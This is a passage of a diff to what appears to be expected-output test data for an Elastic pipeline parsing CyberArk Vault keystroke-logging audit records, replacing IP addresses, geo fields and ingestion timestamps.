\u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:49\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:49Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { @@ -191,14 +169,14 @@ "managed_account": "Yes", "psmid": "PSMServer", "session_id": "d284c268-2ba0-4366-af52-e33459b073a1", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "command": "sudo su" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -210,9 +188,9 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Keystroke logging", "timestamp": "Mar 14 06:49:49", "desc": "Keystroke logging" @@ -223,8 +201,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.191933600Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:49\",\"IsoTimestamp\":\"2021-03-14T13:49:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=10T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165101100Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:49\",\"IsoTimestamp\":\"2021-03-14T13:49:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", @@ -246,39 +224,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -295,7 +252,7 @@ }, "@timestamp": "2021-03-15T10:32:04.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" @@ -306,16 +263,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:32:04Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:32:04\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:32:04Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:32:04\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:32:04Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { @@ -329,14 +285,14 @@ "managed_account": "Yes", "psmid": "PSMServer", "session_id": "29f340df-89e9-405a-beae-0216390cda42", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "command": "sudo su" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", @@ -346,9 +302,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Keystroke logging", "timestamp": "Mar 15 03:32:04", "desc": "Keystroke logging" @@ -359,8 +315,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.191936800Z", - "original": "\u003c5\u003e1 2021-03-15T10:32:04Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:32:04\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:32:04Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:32:04\",\"IsoTimestamp\":\"2021-03-15T10:32:04Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165104900Z", + "original": "\u003c5\u003e1 2021-03-15T10:32:04Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n 